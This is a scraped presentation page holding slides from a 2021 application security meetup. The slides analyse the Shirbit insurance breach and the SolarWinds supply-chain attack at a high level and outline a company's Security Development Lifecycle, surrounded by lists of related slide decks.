Improve Cybersecurity posture by using ISO/IEC 27032PECB
 
Cyber security for Developers
Cyber security for DevelopersCyber security for Developers
Cyber security for Developerstechtutorus
 
Security Solution - IBM Business Connect Qatar Defend your company against cy...
Security Solution - IBM Business Connect Qatar Defend your company against cy...Security Solution - IBM Business Connect Qatar Defend your company against cy...
Security Solution - IBM Business Connect Qatar Defend your company against cy...Dalia Reda
 
Presentation defend your company against cyber threats with security solutions
Presentation defend your company against cyber threats with security solutionsPresentation defend your company against cyber threats with security solutions
Presentation defend your company against cyber threats with security solutionsxKinAnx
 
SAM05_Barber PW (7-9-15)
SAM05_Barber PW (7-9-15)SAM05_Barber PW (7-9-15)
SAM05_Barber PW (7-9-15)Norm Barber
 
Trending it security threats in the public sector
Trending it security threats in the public sectorTrending it security threats in the public sector
Trending it security threats in the public sectorCore Security
 
Cloud Security: A Business-Centric Approach in 12 Steps
Cloud Security: A Business-Centric Approach in 12 StepsCloud Security: A Business-Centric Approach in 12 Steps
Cloud Security: A Business-Centric Approach in 12 StepsOmar Khawaja
 
SCADA Security Webinar
SCADA Security WebinarSCADA Security Webinar
SCADA Security WebinarAVEVA
 
Cyber Defense - How to be prepared to APT
Cyber Defense - How to be prepared to APTCyber Defense - How to be prepared to APT
Cyber Defense - How to be prepared to APTSimone Onofri
 
How can you deliver a secure product
How can you deliver a secure productHow can you deliver a secure product
How can you deliver a secure productMichael Furman
 
ISM and its impact on Government Project Delivery
ISM and its impact on Government Project DeliveryISM and its impact on Government Project Delivery
ISM and its impact on Government Project DeliveryKevin Landale
 
IBM Cyber Threat Analysis
IBM Cyber Threat AnalysisIBM Cyber Threat Analysis
IBM Cyber Threat AnalysisIBM Government
 
Software security, secure software development in the age of IoT, smart thing...
Software security, secure software development in the age of IoT, smart thing...Software security, secure software development in the age of IoT, smart thing...
Software security, secure software development in the age of IoT, smart thing...LabSharegroup
 
The Challenge of Integrating Security Solutions with CI.pdf
The Challenge of Integrating Security Solutions with CI.pdfThe Challenge of Integrating Security Solutions with CI.pdf
The Challenge of Integrating Security Solutions with CI.pdfSavinder Puri
 

Similar to Application security meetup 27012021 (20)

Information Technology Security Basics
Information Technology Security BasicsInformation Technology Security Basics
Information Technology Security Basics
 
Cybersecurity and continuous intelligence
Cybersecurity and continuous intelligenceCybersecurity and continuous intelligence
Cybersecurity and continuous intelligence
 
Vulnerability Management – Opportunities and Challenges!
Vulnerability Management – Opportunities and Challenges!Vulnerability Management – Opportunities and Challenges!
Vulnerability Management – Opportunities and Challenges!
 
CRI Cyber Board Briefing
CRI Cyber Board Briefing CRI Cyber Board Briefing
CRI Cyber Board Briefing
 
The CISO Problems Risk Compliance Management in a Software Development 030420...
The CISO Problems Risk Compliance Management in a Software Development 030420...The CISO Problems Risk Compliance Management in a Software Development 030420...
The CISO Problems Risk Compliance Management in a Software Development 030420...
 
Improve Cybersecurity posture by using ISO/IEC 27032
Improve Cybersecurity posture by using ISO/IEC 27032Improve Cybersecurity posture by using ISO/IEC 27032
Improve Cybersecurity posture by using ISO/IEC 27032
 
Cyber security for Developers
Cyber security for DevelopersCyber security for Developers
Cyber security for Developers
 
Security Solution - IBM Business Connect Qatar Defend your company against cy...
Security Solution - IBM Business Connect Qatar Defend your company against cy...Security Solution - IBM Business Connect Qatar Defend your company against cy...
Security Solution - IBM Business Connect Qatar Defend your company against cy...
 
Presentation defend your company against cyber threats with security solutions
Presentation defend your company against cyber threats with security solutionsPresentation defend your company against cyber threats with security solutions
Presentation defend your company against cyber threats with security solutions
 
SAM05_Barber PW (7-9-15)
SAM05_Barber PW (7-9-15)SAM05_Barber PW (7-9-15)
SAM05_Barber PW (7-9-15)
 
Trending it security threats in the public sector
Trending it security threats in the public sectorTrending it security threats in the public sector
Trending it security threats in the public sector
 
Topic11
Topic11Topic11
Topic11
 
Cloud Security: A Business-Centric Approach in 12 Steps
Cloud Security: A Business-Centric Approach in 12 StepsCloud Security: A Business-Centric Approach in 12 Steps
Cloud Security: A Business-Centric Approach in 12 Steps
 
SCADA Security Webinar
SCADA Security WebinarSCADA Security Webinar
SCADA Security Webinar
 
Cyber Defense - How to be prepared to APT
Cyber Defense - How to be prepared to APTCyber Defense - How to be prepared to APT
Cyber Defense - How to be prepared to APT
 
How can you deliver a secure product
How can you deliver a secure productHow can you deliver a secure product
How can you deliver a secure product
 
ISM and its impact on Government Project Delivery
ISM and its impact on Government Project DeliveryISM and its impact on Government Project Delivery
ISM and its impact on Government Project Delivery
 
IBM Cyber Threat Analysis
IBM Cyber Threat AnalysisIBM Cyber Threat Analysis
IBM Cyber Threat Analysis
 
Software security, secure software development in the age of IoT, smart thing...
Software security, secure software development in the age of IoT, smart thing...Software security, secure software development in the age of IoT, smart thing...
Software security, secure software development in the age of IoT, smart thing...
 
The Challenge of Integrating Security Solutions with CI.pdf
The Challenge of Integrating Security Solutions with CI.pdfThe Challenge of Integrating Security Solutions with CI.pdf
The Challenge of Integrating Security Solutions with CI.pdf
 

More from lior mazor

GenAI Risks & Security Meetup 01052024.pdf
GenAI Risks & Security Meetup 01052024.pdfGenAI Risks & Security Meetup 01052024.pdf
GenAI Risks & Security Meetup 01052024.pdflior mazor
 
The Power of Malware Analysis and Development.pdf
The Power of Malware Analysis and Development.pdfThe Power of Malware Analysis and Development.pdf
The Power of Malware Analysis and Development.pdflior mazor
 
Reveal the Security Risks in the software Development Lifecycle Meetup 060320...
Reveal the Security Risks in the software Development Lifecycle Meetup 060320...Reveal the Security Risks in the software Development Lifecycle Meetup 060320...
Reveal the Security Risks in the software Development Lifecycle Meetup 060320...lior mazor
 
The Hacking Games - A Road to Post Exploitation Meetup - 20240222.pptx
The Hacking Games - A Road to Post Exploitation Meetup - 20240222.pptxThe Hacking Games - A Road to Post Exploitation Meetup - 20240222.pptx
The Hacking Games - A Road to Post Exploitation Meetup - 20240222.pptxlior mazor
 
Secure Your DevOps Pipeline Best Practices Meetup 08022024.pptx
Secure Your DevOps Pipeline Best Practices Meetup 08022024.pptxSecure Your DevOps Pipeline Best Practices Meetup 08022024.pptx
Secure Your DevOps Pipeline Best Practices Meetup 08022024.pptxlior mazor
 
Why 2024 will become the Year of SaaS Security Meetup 24012024.pptx
Why 2024 will become the Year of SaaS Security Meetup 24012024.pptxWhy 2024 will become the Year of SaaS Security Meetup 24012024.pptx
Why 2024 will become the Year of SaaS Security Meetup 24012024.pptxlior mazor
 
Vulnerability Alert Fatigue and Malicious Code Attacks Meetup 11012024.pdf
Vulnerability Alert Fatigue and Malicious Code Attacks Meetup 11012024.pdfVulnerability Alert Fatigue and Malicious Code Attacks Meetup 11012024.pdf
Vulnerability Alert Fatigue and Malicious Code Attacks Meetup 11012024.pdflior mazor
 
The Hacking Game - Think Like a Hacker Meetup 12072023.pptx
The Hacking Game - Think Like a Hacker Meetup 12072023.pptxThe Hacking Game - Think Like a Hacker Meetup 12072023.pptx
The Hacking Game - Think Like a Hacker Meetup 12072023.pptxlior mazor
 
Sailing Through The Storm of Kubernetes CVEs Meetup 29062023.pptx
Sailing Through The Storm of Kubernetes CVEs Meetup 29062023.pptxSailing Through The Storm of Kubernetes CVEs Meetup 29062023.pptx
Sailing Through The Storm of Kubernetes CVEs Meetup 29062023.pptxlior mazor
 
Emphasizing Value of Prioritizing AppSec Meetup 11052023.pptx
Emphasizing Value of Prioritizing AppSec Meetup 11052023.pptxEmphasizing Value of Prioritizing AppSec Meetup 11052023.pptx
Emphasizing Value of Prioritizing AppSec Meetup 11052023.pptxlior mazor
 
The Hacking Games - Cloud Vulnerabilities Meetup 22032023.pptx
The Hacking Games - Cloud Vulnerabilities Meetup 22032023.pptxThe Hacking Games - Cloud Vulnerabilities Meetup 22032023.pptx
The Hacking Games - Cloud Vulnerabilities Meetup 22032023.pptxlior mazor
 
The Hacking Games - Security vs Productivity and Operational Efficiency 20230119
The Hacking Games - Security vs Productivity and Operational Efficiency 20230119The Hacking Games - Security vs Productivity and Operational Efficiency 20230119
The Hacking Games - Security vs Productivity and Operational Efficiency 20230119lior mazor
 
The Hacking Games - Operation System Vulnerabilities Meetup 29112022
The Hacking Games - Operation System Vulnerabilities Meetup 29112022The Hacking Games - Operation System Vulnerabilities Meetup 29112022
The Hacking Games - Operation System Vulnerabilities Meetup 29112022lior mazor
 
Software Supply Chain Security Meetup 21062022
Software Supply Chain Security Meetup 21062022Software Supply Chain Security Meetup 21062022
Software Supply Chain Security Meetup 21062022lior mazor
 
Application Security - Dont leave your AppSec for the last moment Meetup 2104...
Application Security - Dont leave your AppSec for the last moment Meetup 2104...Application Security - Dont leave your AppSec for the last moment Meetup 2104...
Application Security - Dont leave your AppSec for the last moment Meetup 2104...lior mazor
 
User management - the next-gen of authentication meetup 27012022
User management - the next-gen of authentication meetup 27012022User management - the next-gen of authentication meetup 27012022
User management - the next-gen of authentication meetup 27012022lior mazor
 
Securing and automating your application infrastructure meetup 23112021 b
Securing and automating your application infrastructure meetup 23112021 bSecuring and automating your application infrastructure meetup 23112021 b
Securing and automating your application infrastructure meetup 23112021 blior mazor
 
Application security meetup k8_s security with zero trust_29072021
Application security meetup k8_s security with zero trust_29072021Application security meetup k8_s security with zero trust_29072021
Application security meetup k8_s security with zero trust_29072021lior mazor
 
Application security meetup - cloud security best practices 24062021
Application security meetup - cloud security best practices 24062021Application security meetup - cloud security best practices 24062021
Application security meetup - cloud security best practices 24062021lior mazor
 
Application security meetup data privacy_27052021
Application security meetup data privacy_27052021Application security meetup data privacy_27052021
Application security meetup data privacy_27052021lior mazor
 

More from lior mazor (20)

GenAI Risks & Security Meetup 01052024.pdf
GenAI Risks & Security Meetup 01052024.pdfGenAI Risks & Security Meetup 01052024.pdf
GenAI Risks & Security Meetup 01052024.pdf
 
The Power of Malware Analysis and Development.pdf
The Power of Malware Analysis and Development.pdfThe Power of Malware Analysis and Development.pdf
The Power of Malware Analysis and Development.pdf
 
Reveal the Security Risks in the software Development Lifecycle Meetup 060320...
Reveal the Security Risks in the software Development Lifecycle Meetup 060320...Reveal the Security Risks in the software Development Lifecycle Meetup 060320...
Reveal the Security Risks in the software Development Lifecycle Meetup 060320...
 
The Hacking Games - A Road to Post Exploitation Meetup - 20240222.pptx
The Hacking Games - A Road to Post Exploitation Meetup - 20240222.pptxThe Hacking Games - A Road to Post Exploitation Meetup - 20240222.pptx
The Hacking Games - A Road to Post Exploitation Meetup - 20240222.pptx
 
Secure Your DevOps Pipeline Best Practices Meetup 08022024.pptx
Secure Your DevOps Pipeline Best Practices Meetup 08022024.pptxSecure Your DevOps Pipeline Best Practices Meetup 08022024.pptx
Secure Your DevOps Pipeline Best Practices Meetup 08022024.pptx
 
Why 2024 will become the Year of SaaS Security Meetup 24012024.pptx
Why 2024 will become the Year of SaaS Security Meetup 24012024.pptxWhy 2024 will become the Year of SaaS Security Meetup 24012024.pptx
Why 2024 will become the Year of SaaS Security Meetup 24012024.pptx
 
Vulnerability Alert Fatigue and Malicious Code Attacks Meetup 11012024.pdf
Vulnerability Alert Fatigue and Malicious Code Attacks Meetup 11012024.pdfVulnerability Alert Fatigue and Malicious Code Attacks Meetup 11012024.pdf
Vulnerability Alert Fatigue and Malicious Code Attacks Meetup 11012024.pdf
 
The Hacking Game - Think Like a Hacker Meetup 12072023.pptx
The Hacking Game - Think Like a Hacker Meetup 12072023.pptxThe Hacking Game - Think Like a Hacker Meetup 12072023.pptx
The Hacking Game - Think Like a Hacker Meetup 12072023.pptx
 
Sailing Through The Storm of Kubernetes CVEs Meetup 29062023.pptx
Sailing Through The Storm of Kubernetes CVEs Meetup 29062023.pptxSailing Through The Storm of Kubernetes CVEs Meetup 29062023.pptx
Sailing Through The Storm of Kubernetes CVEs Meetup 29062023.pptx
 
Emphasizing Value of Prioritizing AppSec Meetup 11052023.pptx
Emphasizing Value of Prioritizing AppSec Meetup 11052023.pptxEmphasizing Value of Prioritizing AppSec Meetup 11052023.pptx
Emphasizing Value of Prioritizing AppSec Meetup 11052023.pptx
 
The Hacking Games - Cloud Vulnerabilities Meetup 22032023.pptx
The Hacking Games - Cloud Vulnerabilities Meetup 22032023.pptxThe Hacking Games - Cloud Vulnerabilities Meetup 22032023.pptx
The Hacking Games - Cloud Vulnerabilities Meetup 22032023.pptx
 
The Hacking Games - Security vs Productivity and Operational Efficiency 20230119
The Hacking Games - Security vs Productivity and Operational Efficiency 20230119The Hacking Games - Security vs Productivity and Operational Efficiency 20230119
The Hacking Games - Security vs Productivity and Operational Efficiency 20230119
 
The Hacking Games - Operation System Vulnerabilities Meetup 29112022
The Hacking Games - Operation System Vulnerabilities Meetup 29112022The Hacking Games - Operation System Vulnerabilities Meetup 29112022
The Hacking Games - Operation System Vulnerabilities Meetup 29112022
 
Software Supply Chain Security Meetup 21062022
Software Supply Chain Security Meetup 21062022Software Supply Chain Security Meetup 21062022
Software Supply Chain Security Meetup 21062022
 
Application Security - Dont leave your AppSec for the last moment Meetup 2104...
Application Security - Dont leave your AppSec for the last moment Meetup 2104...Application Security - Dont leave your AppSec for the last moment Meetup 2104...
Application Security - Dont leave your AppSec for the last moment Meetup 2104...
 
User management - the next-gen of authentication meetup 27012022
User management - the next-gen of authentication meetup 27012022User management - the next-gen of authentication meetup 27012022
User management - the next-gen of authentication meetup 27012022
 
Securing and automating your application infrastructure meetup 23112021 b
Securing and automating your application infrastructure meetup 23112021 bSecuring and automating your application infrastructure meetup 23112021 b
Securing and automating your application infrastructure meetup 23112021 b
 
Application security meetup k8_s security with zero trust_29072021
Application security meetup k8_s security with zero trust_29072021Application security meetup k8_s security with zero trust_29072021
Application security meetup k8_s security with zero trust_29072021
 
Application security meetup - cloud security best practices 24062021
Application security meetup - cloud security best practices 24062021Application security meetup - cloud security best practices 24062021
Application security meetup - cloud security best practices 24062021
 
Application security meetup data privacy_27052021
Application security meetup data privacy_27052021Application security meetup data privacy_27052021
Application security meetup data privacy_27052021
 

Recently uploaded

Salesforce Certified Field Service Consultant
Salesforce Certified Field Service ConsultantSalesforce Certified Field Service Consultant
Salesforce Certified Field Service ConsultantAxelRicardoTrocheRiq
 
Adobe Marketo Engage Deep Dives: Using Webhooks to Transfer Data
Adobe Marketo Engage Deep Dives: Using Webhooks to Transfer DataAdobe Marketo Engage Deep Dives: Using Webhooks to Transfer Data
Adobe Marketo Engage Deep Dives: Using Webhooks to Transfer DataBradBedford3
 
KnowAPIs-UnknownPerf-jaxMainz-2024 (1).pptx
KnowAPIs-UnknownPerf-jaxMainz-2024 (1).pptxKnowAPIs-UnknownPerf-jaxMainz-2024 (1).pptx
KnowAPIs-UnknownPerf-jaxMainz-2024 (1).pptxTier1 app
 
Unit 1.1 Excite Part 1, class 9, cbse...
Unit 1.1 Excite Part 1, class 9, cbse...Unit 1.1 Excite Part 1, class 9, cbse...
Unit 1.1 Excite Part 1, class 9, cbse...aditisharan08
 
Unveiling the Tech Salsa of LAMs with Janus in Real-Time Applications
Unveiling the Tech Salsa of LAMs with Janus in Real-Time ApplicationsUnveiling the Tech Salsa of LAMs with Janus in Real-Time Applications
Unveiling the Tech Salsa of LAMs with Janus in Real-Time ApplicationsAlberto González Trastoy
 
Learn the Fundamentals of XCUITest Framework_ A Beginner's Guide.pdf
Learn the Fundamentals of XCUITest Framework_ A Beginner's Guide.pdfLearn the Fundamentals of XCUITest Framework_ A Beginner's Guide.pdf
Learn the Fundamentals of XCUITest Framework_ A Beginner's Guide.pdfkalichargn70th171
 
ODSC - Batch to Stream workshop - integration of Apache Spark, Cassandra, Pos...
ODSC - Batch to Stream workshop - integration of Apache Spark, Cassandra, Pos...ODSC - Batch to Stream workshop - integration of Apache Spark, Cassandra, Pos...
ODSC - Batch to Stream workshop - integration of Apache Spark, Cassandra, Pos...Christina Lin
 
What is Binary Language? Computer Number Systems
What is Binary Language? Computer Number SystemsWhat is Binary Language? Computer Number Systems
What is Binary Language? Computer Number SystemsJheuzeDellosa
 
HR Software Buyers Guide in 2024 - HRSoftware.com
HR Software Buyers Guide in 2024 - HRSoftware.comHR Software Buyers Guide in 2024 - HRSoftware.com
HR Software Buyers Guide in 2024 - HRSoftware.comFatema Valibhai
 
Steps To Getting Up And Running Quickly With MyTimeClock Employee Scheduling ...
Steps To Getting Up And Running Quickly With MyTimeClock Employee Scheduling ...Steps To Getting Up And Running Quickly With MyTimeClock Employee Scheduling ...
Steps To Getting Up And Running Quickly With MyTimeClock Employee Scheduling ...MyIntelliSource, Inc.
 
Alluxio Monthly Webinar | Cloud-Native Model Training on Distributed Data
Alluxio Monthly Webinar | Cloud-Native Model Training on Distributed DataAlluxio Monthly Webinar | Cloud-Native Model Training on Distributed Data
Alluxio Monthly Webinar | Cloud-Native Model Training on Distributed DataAlluxio, Inc.
 
chapter--4-software-project-planning.ppt
chapter--4-software-project-planning.pptchapter--4-software-project-planning.ppt
chapter--4-software-project-planning.pptkotipi9215
 
Professional Resume Template for Software Developers
Professional Resume Template for Software DevelopersProfessional Resume Template for Software Developers
Professional Resume Template for Software DevelopersVinodh Ram
 
Asset Management Software - Infographic
Asset Management Software - InfographicAsset Management Software - Infographic
Asset Management Software - InfographicHr365.us smith
 
Engage Usergroup 2024 - The Good The Bad_The Ugly
Engage Usergroup 2024 - The Good The Bad_The UglyEngage Usergroup 2024 - The Good The Bad_The Ugly
Engage Usergroup 2024 - The Good The Bad_The UglyFrank van der Linden
 
BATTLEFIELD ORM: TIPS, TACTICS AND STRATEGIES FOR CONQUERING YOUR DATABASE
BATTLEFIELD ORM: TIPS, TACTICS AND STRATEGIES FOR CONQUERING YOUR DATABASEBATTLEFIELD ORM: TIPS, TACTICS AND STRATEGIES FOR CONQUERING YOUR DATABASE
BATTLEFIELD ORM: TIPS, TACTICS AND STRATEGIES FOR CONQUERING YOUR DATABASEOrtus Solutions, Corp
 
The Essentials of Digital Experience Monitoring_ A Comprehensive Guide.pdf
The Essentials of Digital Experience Monitoring_ A Comprehensive Guide.pdfThe Essentials of Digital Experience Monitoring_ A Comprehensive Guide.pdf
The Essentials of Digital Experience Monitoring_ A Comprehensive Guide.pdfkalichargn70th171
 
cybersecurity notes for mca students for learning
cybersecurity notes for mca students for learningcybersecurity notes for mca students for learning
cybersecurity notes for mca students for learningVitsRangannavar
 
Call Girls in Naraina Delhi 💯Call Us 🔝8264348440🔝
Call Girls in Naraina Delhi 💯Call Us 🔝8264348440🔝Call Girls in Naraina Delhi 💯Call Us 🔝8264348440🔝
Call Girls in Naraina Delhi 💯Call Us 🔝8264348440🔝soniya singh
 
XpertSolvers: Your Partner in Building Innovative Software Solutions
XpertSolvers: Your Partner in Building Innovative Software SolutionsXpertSolvers: Your Partner in Building Innovative Software Solutions
XpertSolvers: Your Partner in Building Innovative Software SolutionsMehedi Hasan Shohan
 

Recently uploaded (20)

Salesforce Certified Field Service Consultant
Salesforce Certified Field Service ConsultantSalesforce Certified Field Service Consultant
Salesforce Certified Field Service Consultant
 
Adobe Marketo Engage Deep Dives: Using Webhooks to Transfer Data
Adobe Marketo Engage Deep Dives: Using Webhooks to Transfer DataAdobe Marketo Engage Deep Dives: Using Webhooks to Transfer Data
Adobe Marketo Engage Deep Dives: Using Webhooks to Transfer Data
 
KnowAPIs-UnknownPerf-jaxMainz-2024 (1).pptx
KnowAPIs-UnknownPerf-jaxMainz-2024 (1).pptxKnowAPIs-UnknownPerf-jaxMainz-2024 (1).pptx
KnowAPIs-UnknownPerf-jaxMainz-2024 (1).pptx
 
Unit 1.1 Excite Part 1, class 9, cbse...
Unit 1.1 Excite Part 1, class 9, cbse...Unit 1.1 Excite Part 1, class 9, cbse...
Unit 1.1 Excite Part 1, class 9, cbse...
 
Unveiling the Tech Salsa of LAMs with Janus in Real-Time Applications
Unveiling the Tech Salsa of LAMs with Janus in Real-Time ApplicationsUnveiling the Tech Salsa of LAMs with Janus in Real-Time Applications
Unveiling the Tech Salsa of LAMs with Janus in Real-Time Applications
 
Learn the Fundamentals of XCUITest Framework_ A Beginner's Guide.pdf
Learn the Fundamentals of XCUITest Framework_ A Beginner's Guide.pdfLearn the Fundamentals of XCUITest Framework_ A Beginner's Guide.pdf
Learn the Fundamentals of XCUITest Framework_ A Beginner's Guide.pdf
 
ODSC - Batch to Stream workshop - integration of Apache Spark, Cassandra, Pos...
ODSC - Batch to Stream workshop - integration of Apache Spark, Cassandra, Pos...ODSC - Batch to Stream workshop - integration of Apache Spark, Cassandra, Pos...
ODSC - Batch to Stream workshop - integration of Apache Spark, Cassandra, Pos...
 
What is Binary Language? Computer Number Systems
What is Binary Language? Computer Number SystemsWhat is Binary Language? Computer Number Systems
What is Binary Language? Computer Number Systems
 
HR Software Buyers Guide in 2024 - HRSoftware.com
HR Software Buyers Guide in 2024 - HRSoftware.comHR Software Buyers Guide in 2024 - HRSoftware.com
HR Software Buyers Guide in 2024 - HRSoftware.com
 
Steps To Getting Up And Running Quickly With MyTimeClock Employee Scheduling ...
Steps To Getting Up And Running Quickly With MyTimeClock Employee Scheduling ...Steps To Getting Up And Running Quickly With MyTimeClock Employee Scheduling ...
Steps To Getting Up And Running Quickly With MyTimeClock Employee Scheduling ...
 
Alluxio Monthly Webinar | Cloud-Native Model Training on Distributed Data
Alluxio Monthly Webinar | Cloud-Native Model Training on Distributed DataAlluxio Monthly Webinar | Cloud-Native Model Training on Distributed Data
Alluxio Monthly Webinar | Cloud-Native Model Training on Distributed Data
 
chapter--4-software-project-planning.ppt
chapter--4-software-project-planning.pptchapter--4-software-project-planning.ppt
chapter--4-software-project-planning.ppt
 
Professional Resume Template for Software Developers
Professional Resume Template for Software DevelopersProfessional Resume Template for Software Developers
Professional Resume Template for Software Developers
 
Asset Management Software - Infographic
Asset Management Software - InfographicAsset Management Software - Infographic
Asset Management Software - Infographic
 
Engage Usergroup 2024 - The Good The Bad_The Ugly
Engage Usergroup 2024 - The Good The Bad_The UglyEngage Usergroup 2024 - The Good The Bad_The Ugly
Engage Usergroup 2024 - The Good The Bad_The Ugly
 
BATTLEFIELD ORM: TIPS, TACTICS AND STRATEGIES FOR CONQUERING YOUR DATABASE
BATTLEFIELD ORM: TIPS, TACTICS AND STRATEGIES FOR CONQUERING YOUR DATABASEBATTLEFIELD ORM: TIPS, TACTICS AND STRATEGIES FOR CONQUERING YOUR DATABASE
BATTLEFIELD ORM: TIPS, TACTICS AND STRATEGIES FOR CONQUERING YOUR DATABASE
 
The Essentials of Digital Experience Monitoring_ A Comprehensive Guide.pdf
The Essentials of Digital Experience Monitoring_ A Comprehensive Guide.pdfThe Essentials of Digital Experience Monitoring_ A Comprehensive Guide.pdf
The Essentials of Digital Experience Monitoring_ A Comprehensive Guide.pdf
 
cybersecurity notes for mca students for learning
cybersecurity notes for mca students for learningcybersecurity notes for mca students for learning
cybersecurity notes for mca students for learning
 
Call Girls in Naraina Delhi 💯Call Us 🔝8264348440🔝
Call Girls in Naraina Delhi 💯Call Us 🔝8264348440🔝Call Girls in Naraina Delhi 💯Call Us 🔝8264348440🔝
Call Girls in Naraina Delhi 💯Call Us 🔝8264348440🔝
 
XpertSolvers: Your Partner in Building Innovative Software Solutions
XpertSolvers: Your Partner in Building Innovative Software SolutionsXpertSolvers: Your Partner in Building Innovative Software Solutions
XpertSolvers: Your Partner in Building Innovative Software Solutions
 

Application security meetup 27012021

  • 1.
  • 2. Recent Cyber Security Attacks in Israel and Worldwide By Lior Mazor
  • 3. Agenda • 'Shirbit’ Israeli Insurance Company Security Incident • Chain of events • Point of Failures – Self Evaluation • 'Solarwinds’ global Incident • Incident analysis • Correlation – corporate and as a vendor
  • 4. ABOUT MYSELF • Leading and Managing the S-SDLC and information product security at Amdocs • B.Sc. Math & Computer Science • Over 18 years of cybersecurity experience • Implementing and promoting Information Security & Cyber Awareness in various enterprise organizations across the world • Building Enterprise Cyber Defense Methodologies and ‘Execution Practices’ • Expertise in Secure Development, Code Review & Application Penetration Testing • Certified as ISO 27001 Lead Auditor Lior Mazor CISSP, CISM, CDPSE
  • 6. Shirbit Insurance Company – Short Facts With regards to security, the company choose a “CISO as A service” approach – 2 days a week Established officially in 2000 and Considered as part of the small insurance groups in IL The company has ~220 employees based in Israel. The company won a major IL project for insurance hence holding significant personal data (2005) The company holds a cyber security insurance policy by AON (no further details are known) The company utilized an external MDR service, not working on weekends with monitoring abilities only
  • 7. Chain Of Events 29/11 High level understanding of the incident by Shirbit company begins Active Incident in Place 30/11 Shirbit Company notifies the regulators about a potential breach Regulation Update 31/11 The leakage is notified by the media and published cross different media channels Media Notification 1-2/12 Actively from operational to technological and other factors, company begins its response IR kick in 3-4…/12 Black Shadow post its ransom demandd and actively threatens to publish more data Official Ransom demand … 1. Social media accounts on twitter and Telegram opened with the name “Black Shadow” 2. Darknet search for “technical writers” … 1. Shirbit company takes down (willingly or not) its website and all other internet connected servers/applications. 2. Examples of data stollen is leaked … 1. Data examples continue to surface outside, stating the intention and seriousness of Hackers … 1. First TXT message is sent to customers, stating about a potential cyber breach. 2. Company utilize and hire external IR teams and align Gov' … 1. Data continue to be to be published 2. Shirbit doesn’t plan to pay ransom 3. Data is offered for sale on the darknet 4. Shirbit posts FAQ and additional SMS sent to customers
  • 8. Partial Facts, Speculation and Assumptions The details below are taken from OSINT data sources (crowd strike, clear sky, general media channels) The attack didn’t happen overnight – in these types of scenarios, the hacker was able to reach a footprint over the past 2-4 months, waited for a trigger or worked under the radar to achieve significant footprint (“living off the land..”) What about their Security Solutions? Very limited ESET AV with no advanced abilities, their DLP software was not configured well. How were they hacked? From known vulnerabilities never patched on their VPN (Pulse) to security gaps on their OWA (outlook web access) that allowed the injection of a backdoor and from there – direct access to their backup servers Hacktivist, nation planned attack or a Cyber Criminal – all theories apply, some state that the group never existed before (no prior knowledge) and is an Iranian/pro Palestine retaliation. Some state that that during negation it seemed to be IL based attack (publish of Infosec policy and origin of opening the telegram group)..
  • 9. Postmortem Analysis – Points of Failure Self Evaluation! Detect & Analyze Contain, Eradicate & Recover Post- incident activity Prepare Yet to be seen… 1. No official government regulatory statements 2. 4 'class actions' were already filled 3. Company is already “back to business” and issuing new policies 1. To be improved communication to customers and support (minimal FAQ). 2. Ability to evaluate what is the magnitude of breach (Media based) 3. Major attempts to “pass the risk” that are not seen lightly by public 1. The company is still under active incident. 2. Some minor customer notification improvement People Process Tech'
  • 11. 'Solar Winds' IT Management and Monitoring Company
  • 12. 'Solarwinds’ – Supply Chain Type of Attack A different type of attack, not the traditional data leakage or ransomware Different Actors – This type of attack usually has catachrestic of what is define as “nation-based attack”, not the traditional type of attacks, it’s a carefully planned attack involving aspects of espionage with a completely different type of scale and impact How didn’t they find it? Requires maturity around their code, understanding of insider threat and overall security controls to learn about the potential anomaly How is this happening? Backdoor in the code in the mask of a dedicated file or feature, requires inside and internal access to the CI/CD eco-system Look for the weakest chain & major footprint– supply chain attacks are different; they focus to get major footprint via a weak point. Any type of company that can fall under this category can be targeted
  • 13. Solar Winds – SUPPLY CHAIN Based Attack • Sophisticated Way of Attack • Almost impossible to detect (if at all) • The attackers inserted malicious code into DLL • SolarWinds Orion Platform installed • The backdoor activates • Randomly between 12 to 14 days after installation • Attackers ping the backdoor • Gathering and sending info • The backdoor runs commands from attackers
  • 14. What can prevent SolarWinds type of attacks? • As a Corporate: • Perform SDL (Security Development Lifecycle) and change management processes • Map “supply chain” and most valuable assets. • Remove Default credentials from vendor installation play book. • Ensure conditional access to valuable assets. • Enable anomaly detection systems. • Control and audit privilege accounts • As a Vendor: • Perform SDL (Security Development Lifecycle) and change management processes • Secure the development eco-system (CI/CD). • Digitally sign artifacts (yes, still do it). • Peer internal review by R&D • Secure overall corporate environment against rouge actors (corporate accountability)
  • 16. How can you deliver a secure product? Michael Furman, Security Architect
  • 17. The Legend of SDL ● Steve Lipner  Senior Director of Security Engineering Strategy for Microsoft  Key person for the Microsoft SDL
  • 18. What will we cover today? What is an SDL? Why is an SDL important? Sample: Tufin SDL How can you deliver a secure product?
  • 19. About Me ● >12 years in application security ● >8 years with Tufin – Lead Security Architect ● >20 years in software engineering ● www.linkedin.com/in/furmanmichael/ ● ultimatesecpro@gmail.com ● Read my blog https://ultimatesecurity.pro/tags/presentation/ ● Follow me on twitter @ultimatesecpro ● I like to travel, read books and listen to music
  • 20. About ● Market Leader in Security Policy Automation ● Tufin is used by >2000 enterprises  To segment networks and connect applications  On-prem networks, firewalls, cloud and K8S ● We are the Security Policy Company!
  • 21. Journey to our SDL ● Resolving security issues? Easy for me! ● Creating a “security” process? Brand new for me! ● Soooo many things to manage ....  Vulnerabilities discovered by customers  CVEs  Upgrading 3rd-party software  Pen tests  ... and all the other stuff I did not yet even know about ● Saved by the SDL! ● No need to reinvent the wheel Picture is from the “Journey to the Center of the Earth” movie.
  • 22. What is an SDL? ● SDL is the process for developing secure software ● Adds security controls in each development phase SDL = Security Development Lifecycle
  • 23. History of SDL ● Mail of Bill Gates  From: Bill Gates  To: to every full-time employee at Microsoft  Sent: Tuesday, January 15, 2002 5:22 PM  Subject: Trustworthy computing ● Microsoft shutdown Windows development to handle the security issues ● Microsoft SDL  v 1.0 - 2004 (internal)  v 3.2 - 2008 (public)  v 5.2 - 2012 (recent) … Security: The data our software and services store on behalf of our customers should be protected from harm and used or modified only in appropriate ways. Security models should be easy for developers to understand and build into their applications. Photo from yahoo.com
  • 24. Why is an SDL important? Why SDL? • Helps developers build secure software • Ensures security is enabled out of the box • Defines how to respond to discovered vulnerabilities
  • 25. Software Development Life Cycle (SDLC) Implementation Requirements Design Verification Release
  • 26. SDL - Shift Left Implementation Requirements Design Verification Release
  • 27. Tufin SDL Implementation Training Requirements Design Verification Release Response Security Design Security Classroom Sessions Security Champions Security Requirements SAST Software Updates Peer Reviews Internal Security Scans DAST External Security Tests Vulnerabil ity Response Policy
